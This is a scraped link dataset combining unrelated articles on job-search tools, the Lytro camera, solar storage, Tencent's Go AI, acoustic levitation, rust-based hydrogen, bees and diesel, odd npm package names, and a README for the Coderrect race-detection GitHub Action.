branded.me, you can create a personal website optimized for tablets and phones; you can also connect or set up a customized domain name and email address. Getting started is easy—simply transfer the information from your online profile. “Branded.me provides analytics so you can see how often your site is coming up in searches and who’s viewing your site,” said Hannah Morgan, a job search and career guide based in Rochester, N.Y. “And because the information is highly sharable, having a personal website or portfolio extends your brand’s reach.” Morgan also recommends
Spiceworks, a portfolio builder that caters to the needs of tech professionals, but there are dozens of tools to choose from that offer similar turnkey packages.
### Hidden Job Finders
Applying to jobs advertised on
Dice and employers’ websites is an integral component of a comprehensive search strategy, but some positions go to opportunistic candidates before they’re publicized. How do you deal with such conundrums?
Hidden Jobs tracks and reports hiring and expansion announcements from newspapers, online media and company press releases; acting on those tips and information can help you get the jump on the competition.
### Research Tools
Whether you’re trying to find the name of an elusive hiring manager or prepping for an interview or salary negotiation, these tools can simplify and accelerate the research process:
- Craft is a free, open information platform that provides data on dynamic sectors, companies, teams, people and open positions.
- ZoomInfo provides information on people and companies.
- AnnualReports provides annual reports in one single location.
- Job Search Intelligence compiles salary data and compensation from 130 million workers.
- Salary Expert provides salaries, benefits and cost-of-living information.
- Interview Simulator Pro lets you record answers to interview questions and critique your performance on your mobile device.
Good luck!
| true | true | true |
Here are some web tools, plugins and mobile apps for streamlining the job-search process.
|
2024-10-12 00:00:00
|
2015-06-23 00:00:00
|
Article
|
dice.com
|
Dice
| null | null |
|
37,470,863 |
https://www.reuters.com/technology/space/germany-launch-massive-expansion-ev-charging-network-says-scholz-2023-09-05/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
5,039,884 |
http://techcrunch.com/2013/01/10/lytro-reveals-its-software-side-at-ces-video/
|
Lytro Reveals Its Software Side At CES [Video] | TechCrunch
|
Jordan Crook
|
If you haven’t yet experienced the world of light field photography, it’s time to step into the Lytro. (See what I did there?)
The Lytro camera is a brand new form of photographic technology that produces what the company calls a “living photo.” This means that the user has the ability to change the focus from the foreground to background, shift perspective, and add cool color filters to the photos. But this is only the beginning.
What truly makes Lytro unique isn’t the hardware — though the camera itself is undeniably innovative. The most interesting thing about Lytro is that it’s almost more of a software company than a hardware business.
With this new form of technology that captures not only the plane of light, but the direction of the light, there is a *ton* of data to mine out of each photo.
This means that the possibilities are endless, since Lytro simply has to adjust the software to introduce new features. We spoke with Eric Cheng, Director of Photography at Lytro, who hinted that there’s plenty more in store for Lytro users. And the beauty is that it all comes to you over software updates — no hardware upgrades required.
| true | true | true |
If you haven't yet experienced the world of light field photography, it's time to step into the Lytro. (See what I did there?) The Lytro camera is a brand new form of photographic technology that produces what the company calls a "living photo." This means that the user has the ability to change the focus from the foreground to background, shift perspective, and add cool color filters to the photos. But this is only the beginning.
|
2024-10-12 00:00:00
|
2013-01-10 00:00:00
|
article
|
techcrunch.com
|
TechCrunch
| null | null |
|
36,435,569 |
https://www.forbes.com/sites/paultassi/2023/06/21/artists-are-mad-about-marvels-secret-invasion-ai-generated-opening-credits/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,428,450 |
https://sivers.org/pinit2
|
Podcast published today
| null |
# Podcast published today
2019-10-29

Starting today you can follow my podcast at sive.rs/podcast.rss or listen on the web at sive.rs/podcast.
Each episode is around two minutes long. They are my posts since September 22nd. 33 episodes so far.
I generated the RSS XML feed myself using this Ruby script. The MP3s are just hosted on my own server. I skipped all the podcast hosting services, because I’ll never have ads so I don’t care about analytics, tracking, and all of that.
It doesn’t cost me anything, so I won’t be trying to make money from it. I’m doing it just because people keep asking me to. ☺
This is all an experiment. Please let me know if you have any suggestions.
| true | true | true | null |
2024-10-12 00:00:00
|
2019-10-29 00:00:00
| null | null | null | null | null | null |
2,362,898 |
http://leaverou.me/2011/02/incrementable-length-values-in-text-fields/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,896,876 |
https://qz.com/1521660/solar-and-batteries-are-retiring-natural-gas-plants/
|
Solar plus batteries aim to retire natural gas plants in 2019
|
Michael J Coren
|
For years, proponents of natural gas referred to it as a “bridge fuel,” an interim power source on the way to a distant future dominated by renewable energy. That far-off day seemed to pose little immediate threat. Not anymore.
Last year, representatives at the World Gas Conference started referring to natural gas as a “destination fuel” instead, even as one US state after another halted plans for natural gas plants.
The nervousness stems from the plummeting prices of solar panels and battery storage. Natural gas plants are the historical go-to choice for “peaker plants,” which provide electricity during times of highest demand. While rarely used (just a few days per year on average), they’re critical to preventing blackouts.
Now, solar project developers are moving into that territory. Solar developers are bidding prices for new electricity capacity lower than natural gas plants even after adding batteries. In December, Credit Suisse confirmed that utility-scale solar-plus-storage was already cheaper than gas peaker plants in many cases.
After years in the doldrums, US energy-storage installations, mostly lithium-ion batteries, are taking off, having risen 57% to 338 MW in 2018 over the previous year, according to estimates by Wood Mackenzie Power & Renewables. Worldwide, 6 gigawatt-hours have been installed.
GE and Siemens have been trying to offload their natural gas turbine businesses as sales tumble. In May 2018, GE cut its sales forecast for its heavy-duty natural gas power plant business by more than half, saying demand would stay at the reduced level through 2020.
| true | true | true |
Natural gas plants are dimming faster than expected.
|
2024-10-12 00:00:00
|
2019-01-11 00:00:00
|
article
|
qz.com
|
Quartz
| null | null |
|
21,704,526 |
https://medium.com/@AnorakVC/why-i-invested-in-zerotier-d459d967c072
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,227,206 |
https://www.wired.com/story/tencent-software-beats-go-champ-showing-chinas-ai-gains/?mbid=social_fb_onsiteshare
|
Tencent Software Beats Go Champ, Showing China's AI Gains
|
Tom Simonite
|
In March 2016, Alphabet’s DeepMind research group set a milestone in artificial intelligence when its AlphaGo program defeated professional Go player Lee Sedol, then fifth-ranked in the world, at the complex board game Go.
Now China’s Tencent is claiming a milestone of its own in Go—and China’s ambitions in artificial intelligence. Last week, the company’s Fine Art program defeated China’s top professional Ke Jie, despite giving him a significant head start. Ke recently slipped to number two in the world, after holding the top spot for three years.
Fine Art’s victory won notice in the world of Go because it helps illustrate the gulf that has opened between human and machine players of the complex boardgame.
But it also highlights a shrinking gulf between AI capabilities in the US and China. In a detailed national strategy for AI released last summer, China set a goal of drawing level with America by 2020, and pulling ahead by 2030. Central, state, and municipal governments are directing money towards AI research and companies.
Tencent, whose offerings span from messaging to payments and music, was named to a “national team” for AI by China’s Ministry of Science and Technology in November, alongside four other tech giants. Greg Allen, an adjunct fellow at the Center for a New American Security, says the company’s Go program shows the US should take China’s technological ambitions seriously. “Fine Art is yet more proof of the stunning progress China has made in AI technology,” he says.
China’s big AI push was partly spurred by AlphaGo’s victory in 2016. Professors who advised the Chinese government on the AI plan told the *New York Times* that Alphabet’s achievement was a “Sputnik moment” in which officials realized they lagged the US in a technology with broad commercial and military applications.
Go was invented in China more than 3,000 years ago, and is still viewed as an important part of Chinese cultural heritage. Players take turns placing stones on a 19-by-19 grid in a battle for territory that is many times more complex than chess.
Handicaps are used to level the playing field between people of different skill levels. Tencent’s Fine Art defeated Ke Jie despite giving the one-time world champion a two-stone head start. That suggests the program is in a different league than the best humans, not just slightly better.
Ingo Althöfer, a math professor and Go expert at Friedrich Schiller University of Jena in Germany, says that it has generally been held that a perfect “Go God” could beat the best human with a three-stone handicap. “Fine Art is trying to reach this limit of perfect play,” he says. Althöfer calls Ke Jie “likely the best human player currently.” DeepMind has so far ignored calls for AlphaGo to play handicapped games in public, Althöfer says.
Alphabet’s use of the game to demonstrate the might of its AI muscle rankled some Chinese officials. Google took AlphaGo to China for a “Future of Go Summit” last summer, with the main event a match in which the software defeated Ke Jie. Chinese state television reversed plans to cover the match shortly before it began, and local internet providers blocked Chinese-language broadcasts half an hour after the match started.
Tencent created Fine Art in 2016, and has previously said the software has beaten several professionals, including Ke Jie. The company says the latest, upgraded version played a series of handicapped games against professionals starting on Jan. 9. The match against the 20-year-old Ke Jie on Jan. 17 was the capstone. Fine Art still isn’t perfect, though. The International Go Federation reports that Fine Art played 34 games against professionals given a two-stone handicap, and won 30.
Those results, like China’s rapid advance in AI, came with an assist from Alphabet and other US companies. Tencent says the latest version of Fine Art drew inspiration from a paper by DeepMind last year about an improved version of AlphaGo called AlphaGo Zero. Alphabet, Microsoft, Facebook, and many other US companies have helped stoke the worldwide uptick of interest in AI by publishing research papers and releasing software packages.
Althöfer is now hoping Tencent and Alphabet will agree to the ultimate Go showdown: Fine Art versus AlphaGo.
- Some US politicians argue restricting Chinese investments would slow the country's advances in AI—it wouldn't work.
- China's roads will open to self-driving vehicles before America's do, says Chinese search engine Baidu.
- Government officials suppressed coverage of Alphabet's software AlphaGo defeating China's top Go player, Ke Jie last summer.
| true | true | true |
China is making a national push in artificial intelligence. A program from one of its biggest internet companies, Tencent, just beat a world champion at Go.
|
2024-10-12 00:00:00
|
2018-01-23 00:00:00
|
article
|
wired.com
|
WIRED
| null | null |
|
28,554,388 |
https://www.youtube.com/watch?v=8xAvVfJ_xyI
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,302,288 |
http://sciencebulletin.org/archives/12855.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
24,475,449 |
https://www.nytimes.com/2020/09/09/upshot/coronavirus-surprise-test-fees.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
2,517,974 |
http://www.edge.org/documents/archive/edge342.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,127,574 |
https://rivery.io/
|
Cloud ELT Tool | Data Pipeline & Integration Platform - Rivery
| null |
# Make your data flow
## Rivery makes it easy to build end-to-end ELT data pipelines quickly. No-code or custom code, for analytics or AI: Rivery works for you.
## Rivery Copilot
## Ingest
Easily extract data from any app or database. Load it right into your data lake or cloud data warehouse via managed API and CDC replication in a few clicks.
## Transform
Turn raw data into business data models with SQL or Python. Automate your entire data integration process with advanced transformation workflows or our pre-built data model kits.
## Orchestrate
Control your data flow from start to finish. Efficiently manage dependencies between and within your pipelines with conditional logic, containers, loops, and advanced scheduling.
## Activate
Push data directly into your tech stack with reverse ETL. Enrich data in your CRM, send data insights to Slack, trigger a Tableau refresh, control any service API.
## Scale
Manage your DataOps with zero effort. Get a clear line of sight into all your pipeline activity and consumption. Add pipelines without any infrastructure setbacks. Instantly deploy between environments and roll back seamlessly between versions.
## Achieve more with less
### Accelerate
data delivery
Build advanced data pipelines in minutes. Deploy end-to-end data solutions with our starter kits.
7.5x
Faster time to value
### Simplify
your stack
Go from duct taping 3-4 tools to a complete SaaS platform. Cut overhead and data silo costs working from one place.
33%
Reduction in data-related costs
### Solve
complex use cases
Connect to all your data without pre-built integrations. Simply run advanced workflows or Python scripts.
50%
Less time spent on data processing
## Integrate with any data source
Award-winning support
Work with data you can trust
Top-rated ETL tool
| true | true | true |
Easily solve your most complex data pipeline challenges with Rivery’s fully-managed cloud ELT tool. Start a FREE trial now!
|
2024-10-12 00:00:00
|
2024-09-11 00:00:00
|
website
|
rivery.io
|
Rivery
| null | null |
|
33,614,509 |
https://planet.one/scene
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,023,117 |
http://www.npr.org/blogs/thetwo-way/2014/01/02/259148381/using-sound-to-levitate-objects-and-move-them-in-mid-air
|
Using Sound To Levitate Objects And Move Them Midair
|
Bill Chappell
|
# Using Sound To Levitate Objects And Move Them Midair
Researchers in Tokyo have put a new twist on the use of sound to suspend objects in air. They've used ultrasonic standing waves to trap pieces of wood, metal, and water – and even move them around.
Researchers have used sound to levitate objects in previous experiments, dating back decades. But that work has largely relied on speakers that were set up in a line to bounce sound waves off a hard surface.
The new experiment uses four speakers to surround an open square area that's about 21 inches wide. Four phased arrays use standing waves to create an ultrasonic focal point in that space, as the researchers explain in a video about their work.
That means that they generate a suspending force — which can then trap particles and objects in mid-air. The objects can be moved around by manipulating the waves.
The researchers' video shows several items being placed in the test area, from drops of water to small plastic and metal machine parts and a length of a wooden match measuring three centimeters.
The device uses sound at the frequency of 40 kHz — beyond the upper limits of human hearing at 20 kHz.
The University of Tokyo researchers' video, called Three-Dimensional Mid-Air Acoustic Manipulation [Acoustic Levitation], expands on a research article they submitted to arXiv, a science publishing site maintained by Cornell University, last month.
Here's how the researchers describe their work:
"Our manipulation system has two original features. One is the direction of the ultrasound beam, which is arbitrary because the force acting toward its center is also utilized. The other is the manipulation principle by which a localized standing wave is generated at an arbitrary position and moved three-dimensionally by opposed and ultrasonic phased arrays."
The Japanese researchers — Yoichi Ochiai, Takayuki Hoshi, and Jun Rekimoto — say they're looking at ways to manipulate larger objects. And it seems they also see their device as a potential option for moving items around in low-gravity environments, such as in space or orbit.
"It has not escaped our notice that our developed method for levitation under gravity suggests the possibility of developing a technology for handling objects under microgravity," they write.
The levitation techniques open another window into a potential future of manipulating devices — earlier today, Mark wrote about an MIT project that created a way to let people move items remotely within a workspace.
We first spotted the eye-catching video of their sound-levitation work at the tech site Hardware 360.
| true | true | true |
Researchers in Tokyo have put a new twist on the use of sound to suspend objects in air. They've used ultrasonic standing waves to trap pieces of wood, metal and water – and even move them around.
|
2024-10-12 00:00:00
|
2014-01-02 00:00:00
|
article
|
npr.org
|
NPR
| null | null |
|
12,442,172 |
http://news.nationalpost.com/features/how-edward-snowden-escaped-hong-kong
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
37,403,363 |
https://www.bleepingcomputer.com/news/technology/yes-theres-an-npm-package-called-env-and-some-others-like-it/
|
Yes, there's an npm package called @(-.-)/env and some others like it
|
Ax Sharma
|
Strangely named npm packages like -, @!-!/-, @(-.-)/env, and --hepl continue to exist on the internet's largest software registry.
While not all of these may necessarily pose an obvious security risk, some were named before npm enforced naming guidelines and could potentially break tooling.
My colleague and Sonatype senior software engineer Lex Vorona came across not one but several npm packages that do not strictly follow naming conventions, or have rather striking names.
"If you search for `@!-!/-`
on npmjs.com it will tell you there are no packages like this. But if you just put that into the URL you'll see that it is actually a package: https://www.npmjs.com/package/@!-!/-," Vorona shared with BleepingComputer.
Package names beginning with an "@" indicate that the package is scoped as the symbol is used to denote scopes, or namespaces on the npm registry.
For example, a company named "Example Inc." may choose to publish its npm packages "foo" and "bar" under its *@example* scope, making these packages appear as *@example/foo* and *@example/bar* on npmjs.com. The forward slash (/) following the @ sign is used as a delimiter or separator between the scope and the package name.
That means, the package itself is called "-" but published under an oddly named scope "!-!" giving it a funky moniker altogether.
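As a quick, hedged illustration (the `@example` scope and the version number below are hypothetical), this is how a scoped package is installed and how it is recorded in a project's `package.json`:

```
# Install the package "foo" published under the "example" scope
npm install @example/foo

# The dependency is then listed under its full scoped name:
#   "dependencies": {
#     "@example/foo": "^1.0.0"
#   }
```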
"There are also exist `@----/-`
and `@-)/utils`
which are also not searchable," Vorona further told us.
According to the npm security platform, Socket, @----/- is an empty package—containing no functional code other than the manifest, while @-)/utils is deprecated. @!-!/- contains minimal code.
The engineer compiled a list of several oddly named packages, some with scope names that included a text emoji:
@!!!!!/javascript
@!!!!!/mounted-to-dom
@!!!!!/polarbear
@!!!!!/require
@!!!!!/walk-up
@!!!!!/walk_up
@!-!/-
@!tach!/sgejs
@!vanilla/container
@(-.-)/application-error
@(-.-)/automaintainer
@(-.-)/env
@(-.-)/html
@(-.-)/result
@(-.-)/swagger-ui
@(._.)/execute
@(._.)/oooooo
@(~_~)/flex
@))/singleton
@-)/utils
@----/-
@-./db
@-0/amplify
@-0/browser
@-0/hdom
@-0/keys
@-0/spool
@-0/utils
## Package names or commands?
While not all of these packages might be malicious or pose a threat, these could certainly confuse or break software development tooling that is not accustomed to parsing packages with unconventional names.
In an exclusive report, BleepingComputer had previously shed light on an empty npm package "-" with more than 700,000 downloads.
The reason for this was hypothesized to be developers accidentally typing an extra hyphen ("-") in command line instructions, such as *npm i*, that would cause their npm client to download this empty package in addition to the package that they had intended to download.
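As an illustrative sketch of that hypothesis (the package names here are only examples), a stray hyphen typed as its own argument is parsed as a package name rather than a flag:

```
# Intended command: install lodash as a dev dependency
npm i lodash --save-dev

# An accidental extra "-" makes npm also install the package literally
# named "-" alongside lodash:
npm i lodash - --save-dev
```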
Tactfully named packages like "--hepl" (as opposed to "--help") may achieve a similar effect given their typo-squatting potential.
BleepingComputer observed that as soon as "--hepl" is installed, it displays the message "You is pwnd" on the developer's console, making it a proof-of-concept (PoC) exercise. Not all packages might be this forgiving.
Although realistically, in most cases, providing "--hepl" as a command line argument may cause your tools to reject it as an invalid option and stop there.
Other examples of single-letter packages, or those resembling npm commands include, but aren't limited to: i, g, install, D, and s.
Starting in 2017, npm made revisions to its naming rules to thwart typosquats, disallowing upper-case letters in package names and the unscrupulous use of punctuation marks to sneak in typosquats. But it may be more challenging to purge existing packages that were published before these rules came into effect.
## Post a Comment Community Rules
## You need to login in order to post a comment
Not a member yet? Register Now
| true | true | true |
Strangely named npm packages like -, @!-!/-, @(-.-)/env, and --hepl continue to exist on the internet's largest software registry. While not all of these may necessarily pose an obvious security risk, some were named before npm enforced naming guidelines and could potentially break tooling.
|
2024-10-12 00:00:00
|
2023-09-02 00:00:00
|
article
|
bleepingcomputer.com
|
BleepingComputer
| null | null |
|
10,414,469 |
http://www.eurekalert.org/pub_releases/2015-10/uos-sas101915.php
|
Scents and sense ability: Diesel fumes alter half the flower smells bees need
| null |
In polluted environments, diesel fumes may be reducing the availability of almost half the most common flower odours that bees use to find their food, research has found.
The new findings suggest that toxic nitrous oxide (NOx) in diesel exhausts could be having an even greater effect on bees' ability to smell out flowers than was previously thought.
NOx is a poisonous pollutant produced by diesel engines which is harmful to humans, and has also previously been shown to confuse bees' sense of smell, which they rely on to sniff out their food.
Researchers from the University of Southampton and the University of Reading found that there is now evidence to show that, of the eleven most common single compounds in floral odours, five can be chemically altered by exposure to NOx gases from exhaust fumes.
Lead author Dr Robbie Girling, from the University of Reading's Centre for Agri-Environmental Research (formerly of University of Southampton), said: "Bees are worth millions to the British economy alone, but we know they have been in decline worldwide.
"We don't think that air pollution from diesel vehicles is the main reason for this decline, but our latest work suggests that it may have a worse effect on the flower odours needed by bees than we initially thought.
"People rely on bees and pollinating insects for a large proportion of our food, yet humans have paid the bees back with habitat destruction, insecticides, climate change and air pollution.
"This work highlights that pollution from dirty vehicles is not only dangerous to people's health, but could also have an impact on our natural environment and the economy."
Co-author Professor Guy Poppy, from Biological Sciences at the University of Southampton, said: "It is becoming clear that bees are at risk from a range of stresses from neonicitinoid insecticides through to varroa mites. Our research highlights that a further stress could be the increasing amounts of vehicle emissions affecting air quality. Whilst it is unlikely that these emissions by themselves could be affecting bee populations, combined with the other stresses, it could be the tipping point."
###
This latest research is part of continuing studies into the effects of air pollution on bees. Previous work in 2013 found that bees in the lab could be confused by the effects of diesel pollution. Dr Girling and Dr Tracey Newman from the University of Southampton are currently studying how diesel fumes may have direct effects on the bees themselves.
The work is published in the *Journal of Chemical Ecology* and was funded by the Leverhulme Trust.
#### Journal
Journal of Chemical Ecology
| true | true | true |
In polluted environments, diesel fumes may be reducing the availability of almost half the most common flower odours that bees use to find their food, research has found.
|
2024-10-12 00:00:00
|
2015-10-19 00:00:00
|
https://earimediaprodweb.azurewebsites.net/Api/v1/Multimedia/f06a02fb-fbb7-4c8a-b0a6-1214df74401f/Rendition/thumbnail/Content/Public
|
website
|
eurekalert.org
|
EurekAlert!
| null | null |
6,010,961 |
http://www.bbc.co.uk/news/science-environment-23226798
|
Rust promises hydrogen power boost
|
Simon Redfern
|
# Rust promises hydrogen power boost
- Published
**Rust could help boost the efficiency of hydrogen production from sunlight - a potentially green source of energy.**
Tiny (nano-sized) particles of haematite (crystalline iron oxide, or rust) have been shown to split water into hydrogen and oxygen in the presence of solar energy.
The result could bring the goal of generating cheap hydrogen from sunlight and water a step closer to reality.
Details are published in the journal Nature Materials.
Researchers from Switzerland, the US and Israel identified what they termed "champion nanoparticles" of haematite, which are a few billionths of a metre in size.
Bubbles of hydrogen gas appear spontaneously when the tiny grains of haematite are put into water under sunlight as part of a photoelectrochemical cell (PEC).
The nanostructures look like minuscule cauliflowers, and they are grown as a layer on top of an electrode.
The key to the improvement lies in understanding how electrons inside the haematite crystals interact with the edges of grains within these "champions".
Where the particle is correctly oriented and contains no grain boundaries, electrons pass along efficiently.
This allows water splitting to take place that leads to the capture of about 15% of the energy in the incident sunlight - that which falls on a set area for a set length of time. This energy can then be stored in the form of hydrogen.
Identifying the champion nanoparticles allowed Scott Warren and Michael Graetzel from the University of Lausanne, Switzerland, to master the methods for increasing the effectiveness of their prototype cell.
Iron oxide is cheap, and the electrodes used to create abundant, environmentally-friendly hydrogen from water in this photochemical method should be inexpensive and relatively efficient.
The hydrogen made from water and sunlight in this way could then be stored, transported, and sold on for subsequent energy needs in fuel cells or simply by burning.
Commenting on the research, Dr Chin Kin Ong, from the department of chemical engineering at Imperial College London told BBC News the research could yield material that was "cheap, earth-abundant and efficient at photon-to-electron-to hydrogen energy conversion".
- Published28 February 2013
- Published20 September 2011
- Published15 August 2011
| true | true | true |
A discovery by an international team of scientists could help boost the efficiency of hydrogen production from the Sun's rays - a potentially green source of energy.
|
2024-10-12 00:00:00
|
2013-07-08 00:00:00
|
article
|
bbc.com
|
BBC News
| null | null |
|
25,928,639 |
https://github.com/coderrect-inc/coderrect-github-action
|
GitHub - coderrect-inc/coderrect-github-action: Coderrect is a static analyzer for concurrent C/C++/Fortran programs to detect data-races/race-conditions/anti-patterns.
|
Coderrect-Inc
|
**GitHub Action for the Coderrect static race detection scanner**
The `coderrect-github-action`
runs static analysis in a GitHub workflow using Coderrect to automatically detect concurrency bugs in your code:
- Coderrect is an efficient and accurate static analysis solution to identify potential concurrency bugs in your multi-threaded software.
- Coderrect supports C/C++/Fortran code and common parallel programming interfaces including OpenMP, pthread, and C++ std::thread.
- Coderrect Github Action supports generating formatted HTML reports and hosting them on Coderrect cloud for users to review.
Documentation and examples are available at: Coderrect Action Documentation
More information about Coderrect Scanner is available at: Coderrect.com
If you are an experienced user of GitHub Action, you can easily integrate Coderrect to your workflow by adding the following to `.github/workflows/ci.yml`
:
```
# Add the following to "steps"
- name: Coderrect Scan
uses: coderrect-inc/coderrect-github-action@main
```
**Table of Contents**
Continuous Integration/Continuous Delivery (CI/CD) is a common practice now for developing software. In CI, typically tests and checks are run against every pull request and code commit to ensure the new code changes do not break anything or introduce new bugs. CI makes it easier to fix bugs quickly and often.
You can create custom CI/CD workflows directly in your GitHub repository with **GitHub Actions**.
In this tutorial, we take memcached as an example project to demonstrate how to set up GitHub Actions.
To start, you can click the “Action“ tab above your GitHub Repository.
Once you enter the Action tab, GitHub will guide you to create your own CI/CD script by providing different template scripts based on different build systems.
Here you can select **“set up a workflow yourself“** to use the basic template.
GitHub will automatically create a YAML file (`main.yml`
by default) under ** .github/workflows** and this is the path which you should put your future scripts under. The left-hand side is the script editor and the right-hand side is the place you can search different existing Action scripts published in GitHub Marketplace.
The default template script looks similar to the one below; we will explain it in detail:
```
# This is a basic workflow to help you get started with Actions
name: CI
# Controls when the action will run.
on:
push:
branches: [ main ]
pull_request:
branches: [ main ]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# Defines the workflow of this action.
jobs:
# This workflow contains a single job called "build"
build:
# The type of runner that the job will run on
runs-on: ubuntu-latest
# Steps represent a sequence of tasks that will be executed as part of the job
steps:
# Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
- uses: actions/checkout@v2
# Runs a single command using the runners shell
- name: Run a one-line script
run: echo Hello, world!
# Runs a set of commands using the runners shell
- name: Run a multi-line script
run: |
echo Add other actions to build,
echo test, and deploy your project.
```
The definition of an action consists of two major parts: `on` and `jobs`.

Field `on` defines when this action will be triggered. The default template only triggers the action when there’s a push or pull request made upon the main branch.
For example, if you want the action to be triggered at any event on any branch, you can simply change the script to:
```
on: [push, pull_request]
```
If you only want to trigger actions manually, then you should specify `workflow_dispatch`
instead. This will create a button in the Action Tab for you to trigger them manually later. Check out this blog on how to manually trigger GitHub Actions.
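For example, a minimal sketch of a trigger section that only allows manual runs looks like this:

```
on:
  # No push or pull_request triggers: the workflow can only be started
  # manually from the button in the Actions tab.
  workflow_dispatch:
```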
Field `job` defines the actual workflow of the action. The subfield `build` is a customized job name, and you can change it to something more meaningful, such as `test-build-on-ubuntu`.

`runs-on` specifies the system image on which you want to run your CI/CD tasks.

`steps` specifies the detailed sub-tasks performed in a job. You can compose your CI/CD job using the published Actions from GitHub Marketplace and your own customized scripts.
Take memcached as an example for integrating Coderrect. Check here for the final script.
In general, integrating Coderrect requires three steps:
```
steps:
# step 1
- uses: actions/checkout@v2
# step 2
- name: Install deps
run: |
sudo apt-get update -y
sudo apt-get install -y libevent-dev libseccomp-dev git libsasl2-dev
- name: Build
run: |
gcc --version
./autogen.sh
./configure --enable-seccomp --enable-tls --enable-sasl --enable-sasl-pwdb
make -j
# step 3
- name: coderrect scan
uses: coderrect-inc/coderrect-github-action@main
```
- **Step 1**: Check out your GitHub repository, using an action provided by GitHub.
- **Step 2**: Installs all dependencies required for building the project ("Install deps") and does a test build ("Build").
  Note that including task "Build" is **not required** for Coderrect to function, but it's critical to make sure your project can successfully build before applying Coderrect.
- **Step 3**: Apply Coderrect to your project. You can search the GitHub Marketplace to obtain the most updated script and all available options.
Once this script is saved, the GitHub Action you just defined will be automatically triggered when you push new commits or merge pull requests. You can review them by entering the “Action“ tab.
To see Coderrect’s race detection report, you can click task "coderrect scan" to expand its terminal output. Coderrect will output a summary for each executable it analyzes and also attach a report link at the end so you can view the results in detail.
If you are using a different building system (e.g., CMake) or a different language or compiler, then you need to properly configure Coderrect. Here we provide instructions for some commonly used configurations.
You will need to install and set up `cmake` first.
```
- name: download cmake
run: |
wget https://cmake.org/files/v3.18/cmake-3.18.2-Linux-x86_64.tar.gz
tar xf cmake-3.18.2-Linux-x86_64.tar.gz
mkdir build && cd build
../cmake-3.18.2-Linux-x86_64/bin/cmake ..
```
Since we are building the project under the `build` directory instead of the root path, we also need to specify the build directory for Coderrect.
```
- name: Coderrect Scan
uses: coderrect-inc/[email protected]
with:
buildPath: "build"
```
For more details, take a look at this cmake project to learn how to integrate Coderrect into more complex projects.
You will need to install the Fortran compiler first. For example:
```
- name: Install fortran
run: |
sudo apt-get update -y
sudo apt-get install -y gfortran
```
Then it is likely that you need to specify the Fortran compiler when you use `make`. If so, you should also pass the full compilation command to Coderrect. (`gcc` is pre-installed in the GitHub Actions environment.)
```
- name: coderrect scan
uses: coderrect-inc/[email protected]
with:
buildCommand: "make COMPILER=GNU MPI_COMPILER=gfortran C_MPI_COMPILER=gcc"
```
For more details, take a look at this Fortran project to learn how to integrate Coderrect into more complex projects.
Coderrect allows you to provide a configuration file to fully customize your analysis.
In order to do so, check our documentation to see the available configurations. Once you have written a configuration file (say `coderrect.json`), you can pass it to the scanner as below:
```
- name: coderrect scan
uses: coderrect-inc/[email protected]
with:
options: "-analyzeAllBinaries -conf=/path/to/coderrect.json"
```
The path should be **a relative path from your build directory** (e.g., if your build directory is `./build/`
and your config file is under the root path, then you should specify the config file as `"-conf=../coderrect.json"`
).
Inputs are the set of fields you can configure to customize the behavior of the Coderrect GitHub Action; a combined example follows the list below.
`buildCommand`
- Default: `"make -j"`
- Description: The command to build your project. For example, the command to build your whole project might be `make all` instead of `make`.

`cleanCommand`
- Default: `"make clean || true"`
- Description: The command to clean your previous build. Coderrect needs to capture the building process for analysis, therefore if you have done a test build before applying Coderrect, we need to clean your test build first.

`buildPath`
- Default: `"."` (the root path of your project)
- Description: The relative path for your cmake project's build directory.

`options`
- Default: `"-analyzeAllBinaries"`
- Description: The command line options for Coderrect Scanner. Check the documentation for all supported options.

`exit0`
- Default: false
- Description: By default, Coderrect will exit with 1 if any race is detected, thus your following CI/CD workflow will be blocked. Set this to true if you want CI/CD to proceed after Coderrect no matter what.
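Putting these together, here is a hedged sketch of a single workflow step that sets every documented input explicitly; the values shown are the defaults or simple placeholders you would adapt to your own project.

```
- name: Coderrect Scan
  uses: coderrect-inc/coderrect-github-action@main
  with:
    # Clean any earlier test build so Coderrect can capture a full build.
    cleanCommand: "make clean || true"
    # The build command Coderrect will capture and analyze.
    buildCommand: "make -j"
    # Relative path to the build directory (e.g. "build" for a CMake setup).
    buildPath: "."
    # Extra scanner options; check the documentation for the full list.
    options: "-analyzeAllBinaries"
    # Set to true to let the rest of the CI/CD workflow continue even if races are found.
    exit0: true
```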
Copyright 2020 Coderrect Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
```
http://www.apache.org/licenses/LICENSE-2.0
```
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
| true | true | true |
Coderrect is a static analyzer for concurrent C/C++/Fortran programs to detect data-races/race-conditions/anti-patterns. - coderrect-inc/coderrect-github-action
|
2024-10-12 00:00:00
|
2020-12-02 00:00:00
|
https://repository-images.githubusercontent.com/317742957/f0cb3000-6020-11eb-98bf-6fe50c59e8df
|
object
|
github.com
|
GitHub
| null | null |
8,045,373 |
http://www.theguardian.com/science/2014/jul/13/laboratory-grown-beef-meat-without-murder-hunger-climate-change
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,826,919 |
https://lemire.me/blog/2018/04/12/for-greater-speed-try-batching-your-out-of-cache-data-accesses/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |